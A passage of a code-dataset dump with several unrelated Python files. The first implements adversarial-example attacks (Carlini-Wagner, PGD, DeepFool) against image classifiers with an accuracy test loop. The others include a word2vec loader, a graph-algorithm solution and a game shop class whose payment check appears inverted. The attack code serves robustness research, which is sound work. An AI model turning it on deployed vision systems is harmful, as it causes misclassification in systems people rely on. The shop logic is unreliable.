Clip attack images(X')\n # min{255, X+eps, max{0, X-eps, X'}}\n # = min{255, min{X+eps, max{max{0, X-eps}, X'}}}\n\n # a = max{0, X-eps}\n a = torch.clamp(images - eps, min=0)\n # b = max{a, X'}\n b = (adv_images>=a).float()*adv_images + (a>adv_images).float()*a\n # c = min{X+eps, b}\n c = (b > images+eps).float()*(images+eps) + (images+eps >= b).float()*b\n # d = min{255, c}\n images = torch.clamp(c, max=1).detach_()\n\n return images\n\n\ndef cw_linf_attack(model, images, labels, targeted=False, c=1e-2, kappa=0, max_iter=20, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n outputs = model(x)\n one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n\n i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n j = torch.masked_select(outputs, one_hot_labels.bool())\n\n # If targeted, optimize for making the other class most likely\n if targeted:\n return torch.clamp(i-j, min=-kappa)\n\n # If untargeted, optimize for making the other class most likely\n else:\n return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n loss1 = torch.sum(c*f(images + w))\n loss2 = torch.sum(torch.relu(w-0.031))\n\n # a = 1/2*(nn.Tanh()(w) + 1)\n #\n # loss1 = nn.MSELoss(reduction='sum')(a, images)\n # loss2 = torch.sum(c*f(a))\n #\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n # print('Attack Stopped due to CONVERGENCE....')\n return images + torch.clamp(w, max=0.031)\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = images + torch.clamp(w, max=0.031)\n\n return attack_images\n\n\n# CW-L2 Attack\n# you can call this function as\n# perturbated_images = cw_l2_attack(model, images, labels, targeted=False, c=0.1)\n# Based on the paper, i.e. 
not exact same version of the code on https://github.com/carlini/nn_robust_attacks\n# (1) Binary search method for c, (2) Optimization on tanh space, (3) Choosing method best l2 adversaries is NOT IN THIS CODE.\ndef cw_l2_attack(model, images, labels, targeted=False, c=1e-2, kappa=0, max_iter=30, learning_rate=0.01, device='cuda'):\n\n # Define f-function\n def f(x):\n outputs = model(x)\n one_hot_labels = torch.eye(len(outputs[0]))[labels].to(device)\n\n i, _ = torch.max((1-one_hot_labels)*outputs, dim=1)\n j = torch.masked_select(outputs, one_hot_labels.bool())\n\n # If targeted, optimize for making the other class most likely\n if targeted:\n return torch.clamp(i-j, min=-kappa)\n\n # If untargeted, optimize for making the other class most likely\n else:\n return torch.clamp(j-i, min=-kappa)\n\n w = torch.zeros_like(images, requires_grad=True).to(device)\n w.detach_()\n w.requires_grad = True\n\n optimizer = optim.Adam([w], lr=learning_rate)\n prev = 1e10\n\n for step in range(max_iter):\n\n a = 1/2*(nn.Tanh()(w) + 1)\n\n loss1 = nn.MSELoss(reduction='sum')(a, images)\n loss2 = torch.sum(c*f(a))\n\n cost = loss1 + loss2\n\n optimizer.zero_grad()\n cost.backward()\n optimizer.step()\n\n # Early Stop when loss does not converge.\n if step % (max_iter//10) == 0:\n if cost > prev:\n print('Attack Stopped due to CONVERGENCE....')\n return (1/2*(nn.Tanh()(w) + 1)).detach()\n prev = cost\n\n # print('- Learning Progress : %2.2f %% ' %((step+1)/max_iter*100), end='\\r')\n\n attack_images = 1/2*(nn.Tanh()(w) + 1).detach()\n\n return attack_images\n\ndef pgd_attack(model, images, labels, targeted=False, eps=8/255, alpha=1/255, iters=20, random_start=True):\n\n loss = nn.CrossEntropyLoss()\n if targeted:\n loss = lambda x, y: -nn.CrossEntropyLoss()(x, y)\n\n ori_images = images.clone().detach()\n\n if random_start:\n # Starting at a uniformly random point\n images = images + torch.empty_like(images).uniform_(-eps, eps)\n images = torch.clamp(images, min=0, max=1)\n\n for i in range(iters):\n images.requires_grad = True\n outputs = model(images)\n\n cost = loss(outputs, labels)\n\n grad = torch.autograd.grad(cost, images,\n retain_graph=False, create_graph=False)[0]\n\n adv_images = images + alpha * grad.sign()\n eta = torch.clamp(adv_images - ori_images, min=-eps, max=eps)\n images = torch.clamp(ori_images + eta, min=0, max=1).detach()\n\n adv_images = images\n\n return adv_images\n\ndef deepfool(model, images, labels, steps=20):\n\n for b in range(images.shape[0]):\n\n image = images[b:b + 1, :, :, :]\n\n image.requires_grad = True\n output = model(image)[0]\n\n _, pre_0 = torch.max(output, 0)\n f_0 = output[pre_0]\n grad_f_0 = torch.autograd.grad(f_0, image,\n retain_graph=False,\n create_graph=False)[0]\n num_classes = len(output)\n\n for i in range(steps):\n image.requires_grad = True\n output = model(image)[0]\n _, pre = torch.max(output, 0)\n\n if pre != pre_0:\n image = torch.clamp(image, min=0, max=1).detach()\n break\n\n r = None\n min_value = None\n\n for k in range(num_classes):\n if k == pre_0:\n continue\n\n f_k = output[k]\n grad_f_k = torch.autograd.grad(f_k, image,\n retain_graph=True,\n create_graph=True)[0]\n\n f_prime = f_k - f_0\n grad_f_prime = grad_f_k - grad_f_0\n value = torch.abs(f_prime) / torch.norm(grad_f_prime)\n\n if r is None:\n r = (torch.abs(f_prime) / (torch.norm(grad_f_prime) ** 2)) * grad_f_prime\n min_value = value\n else:\n if min_value > value:\n r = (torch.abs(f_prime) / (torch.norm(grad_f_prime) ** 2)) * grad_f_prime\n min_value = value\n\n image = 
torch.clamp(image + r, min=0, max=1).detach()\n\n        images[b:b + 1, :, :, :] = image\n\n    adv_images = images\n\n    return adv_images\n\ndef test( model, device, test_loader, epsilon, attack_method ):\n\n    # Accuracy counter\n    correct = 0\n    adv_examples = []\n\n    # Loop over all examples in test set\n    for data, target in test_loader:\n\n        # Send the data and label to the device\n        data, target = data.to(device), target.to(device)\n\n        # Set requires_grad attribute of tensor. Important for Attack\n        data.requires_grad = True\n\n        # Forward pass the data through the model\n        output = model(data)\n        init_pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n        print(init_pred)\n        print(target)\n\n        # If the initial prediction is wrong, dont bother attacking, just move on\n        if init_pred.item() != target.item():\n            continue\n        # Calculate the loss\n        loss = F.nll_loss(output, target)\n\n        # Zero all existing gradients\n        model.zero_grad()\n\n        # Calculate gradients of model in backward pass\n        loss.backward()\n\n        # Collect datagrad\n        data_grad = data.grad.data\n\n        # Run the selected attack\n        if attack_method == 'cw_l2_attack':\n            perturbed_data = cw_l2_attack(model, data, target, targeted=False, c=0.3, device=device)\n        elif attack_method == 'fgsm':\n            perturbed_data = fgsm_attack(data, epsilon, data_grad )\n        elif attack_method =='bim':\n            perturbed_data = basic_iterative_attack(model, data, target, eps=4/255, alpha=epsilon)\n\n\n        # Re-classify the perturbed image\n        output = model(perturbed_data)\n\n        # Check for success\n        final_pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability\n        if final_pred.item() == target.item():\n            correct += 1\n            # Special case for saving 0 epsilon examples\n            if (epsilon == 0) and (len(adv_examples) < 5):\n                adv_ex = perturbed_data.squeeze().detach().cpu().numpy()\n                adv_examples.append( (init_pred.item(), final_pred.item(), adv_ex) )\n        else:\n            # Save some adv examples for visualization later\n            if len(adv_examples) < 5:\n                adv_ex = perturbed_data.squeeze().detach().cpu().numpy()\n                adv_examples.append( (init_pred.item(), final_pred.item(), adv_ex) )\n\n    # Calculate final accuracy for this epsilon\n    final_acc = correct/float(len(test_loader))\n    print(\"Epsilon: {}\\tTest Accuracy = {} / {} = {}\".format(epsilon, correct, len(test_loader), final_acc))\n\n    # Return the accuracy and an adversarial example\n    return final_acc, adv_examples\n","sub_path":"free_lunch/attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":14721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389008844","text":"import sqlite3\nimport logging\nimport time\nimport datetime\n\nWORD2VEC_TEXT = \"data/word2vec/jawiki_kv.txt\"\nDB_PATH = \"data/word2vec/kv.db\"\n\ndef return_column_names(n):\n    if n >= 0:\n        r = \"keyword TEXT PRIMARY KEY,\"\n        for i in range(n):\n            r += f\" vec{i} integer,\"\n    else:\n        r = \"?,\"\n        for i in range(-1*n):\n            r += \"?,\"\n    return r[0:-1]\n\nif __name__==\"__main__\":\n\n    start = time.time()\n\n    fmt = \"%(asctime)s %(levelname)s %(name)s :%(message)s\"\n    logging.basicConfig(level=logging.INFO, format=fmt)\n\n    con = sqlite3.connect(DB_PATH)\n    c = con.cursor()\n\n    with open(WORD2VEC_TEXT, \"r\") as f:\n        fl = f.readline()\n        logging.info(\"Start: \" + fl)\n        count = int(fl.split(\" \")[0])\n        size = int(fl.split(\" \")[1])\n        c.execute(f\"create table kv( {return_column_names(size)} );\")\n        for i in range(2, count+2):\n            line = f.readline()\n            row = line.split(\" \")\n            if len(row) != 201:\n                
logging.warn(f\"Index error: line: {i} text: {line}\")\n continue\n c.execute(f\"insert into kv values ({return_column_names(-1*size)});\", row)\n if i % 10**4 == 0:\n logging.info(f\"{i} / {count} done. {i/count*100} percent.\")\n con.commit()\n logging.info(\"DONE!!!\")\n con.commit()\n con.close()\n","sub_path":"vec2db.py","file_name":"vec2db.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336812788","text":"__author__ = 'danil.gizdatullin'\n\nimport matplotlib.pyplot as plt\n\nimport config as conf\n\nf = open(conf.path_to_store_median_similarities, \"r\")\nsimilarities = []\nfor line in f:\n value = float(line[0: -1])\n similarities.append(value)\n\nprint(len(similarities))\n\nplt.hist(similarities, bins=100)\nplt.title(\"Similarities median\")\nplt.xlabel(\"Value\")\nplt.ylabel(\"Frequency\")\nplt.show()\n","sub_path":"Statistics/hist_for_median_similarity.py","file_name":"hist_for_median_similarity.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"580031255","text":"INF = float('inf')\n\n#METHOD 1:\ndef floyd_warshall():\n for k in range(49):\n for i in range(49):\n for j in range(49):\n if dist[i][k] + dist[k][j] > dist[i][j]:\n dist[i][j] = dist[i][k] + dist[k][j]\n \n \nnum_tests = int(input())\nfor t in range(num_tests):\n num_orders = int(input())\n dist = [[0 if i <= j else -INF for j in range(49)] for i in range(49)]\n \n last_time = 0\n for o in range(num_orders):\n s, e, c = map(int, input().split())\n dist[s][e] = max(c, dist[s][e])\n \n\n floyd_warshall()\n print (dist[0][48])\n\n\n\n# #METHOD 2:\n# def dynamic_programming():\n# best_comp_so_far = [0] * (last_time + 1)\n \n# for j in range(1, last_time + 1):\n# for i in range(j):\n# temp_comp = best_comp_so_far[i] + dist[i][j]\n# if temp_comp > best_comp_so_far[j]:\n# best_comp_so_far[j] = temp_comp\n# return best_comp_so_far[last_time] \n\n\n# num_tests = int(input())\n# for t in range(num_tests):\n# num_orders = int(input())\n \n# dist = [[0 for i in range(49)] for j in range(49)]\n# last_time = 0\n# for o in range(num_orders):\n# s, e, c = map(int, input().split())\n# dist[s][e] = max(dist[s][e], c)\n# if e > last_time:\n# last_time = e\n# result = dynamic_programming()\n# print(result)\n# ","sub_path":"codechef/event_organizer.py","file_name":"event_organizer.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589563280","text":"from logger import fin_logger\r\n\r\nclass DB:\r\n\tdef __init__(self):\r\n\t\tself.tanks = {1101: {'credits': 500, 'gold': 0}, #tankID : {params}\r\n\t\t\t\t\t\t\t2101: {'credits': 850, 'gold': 10},\r\n\t\t\t\t\t\t\t3101: {'credits': 1500, 'gold': 50}}\r\n\r\n\t\tself.guns = {1101: {223: {'credits': 20, 'gold': 0}, #tankID : {gunID: {params}}\r\n\t\t\t\t\t\t224: {'credits': 0, 'gold': 30}},\r\n\t\t\t\t\t2101: {555: {'credits': 250, 'gold': 0},\r\n\t\t\t\t\t\t655: {'credits': 240, 'gold': 0}},\r\n\t\t\t\t\t3101: {485: {'credits': 220, 'gold': 0},\r\n\t\t\t\t\t\t286: {'credits': 120, 'gold': 0}}}\r\n\r\nclass Shop:\r\n\tdef __init__(self):\r\n\t\tself.fin_logger = fin_logger()\r\n\t\tself.db = DB()\r\n\r\n\tdef __buyTank(self, player, tankID):\r\n\t\tif tankID in self.db.tanks:\r\n\t\t\tplayer.inventoryPlanes.append(tankID)\r\n\r\n\t\t\tif self.db.tanks[tankID]['credits'] >= player.resources.credits 
and \\\r\n\t\t\t\tplayer.resources.gold >= self.db.tanks[tankID]['gold']:\r\n\r\n\t\t\t\tplayer.resources.credits -= self.db.tanks[tankID]['credits']\r\n\t\t\t\tplayer.resources.gold -= self.db.tanks[tankID]['gold']\r\n\t\t\tplayer.saveResources()\r\n\t\t\tself.fin_logger.log_state(player)\r\n\r\n\tdef __buyGuns(self, *args):\r\n\t\tplayer, tankID, gunID = args\r\n\r\n\t\tif tankID in player.inventoryPlanes and gunID in self.db.guns[tankID]:\r\n\t\t\tplayer.inventoryGuns[tankID].append(gunID)\r\n\t\t\tplayer.resources.credits -= self.db.guns[tankID][gunID]['credits']\r\n\t\t\tplayer.resources.gold -= self.db.guns[tankID][gunID]['gold']\r\n\t\t\tplayer.saveResources()\r\n\r\n\t\tself.fin_logger.log_state(player)","sub_path":"TankShop.py","file_name":"TankShop.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"341838682","text":"# -*- coding: UTF-8 -*-\n\n# # selection sort\n# height = [155, 187, 172, 160, 163, 166, 173, 182, 165, 159]\n# # the outer loop represents the rounds\n# l = len(height)\n# i = 0\n# while i < l - 1:\n#     # inner loop: select the largest\n#     # use the first one as the baseline and record its index\n#     j = 1\n#     tmp = 0\n#     while j < l - i:\n#         if height[tmp] < height[j]:\n#             # record the index of the maximum\n#             tmp = j\n#         j = j + 1\n#     # # move the tallest to the end\n#     t = height[tmp]\n#     height[tmp] = height[l - i - 1]\n#     height[l - i - 1] = t\n#     i += 1\n#     # swap\n#     # height[tmp], height[len(height) - i - 1] = height[len(height) - i - 1], height[tmp]\n#\n# print(height)\n#\n# # bubble sort\n# height = [190, 187, 172, 160, 163, 166, 173, 182, 165, 159]\n#\n# # outer loop: controls the number of comparison rounds\n# i = 0\n# # subtract 1? yes, because the last round has only one number left and needs no comparison\n# while i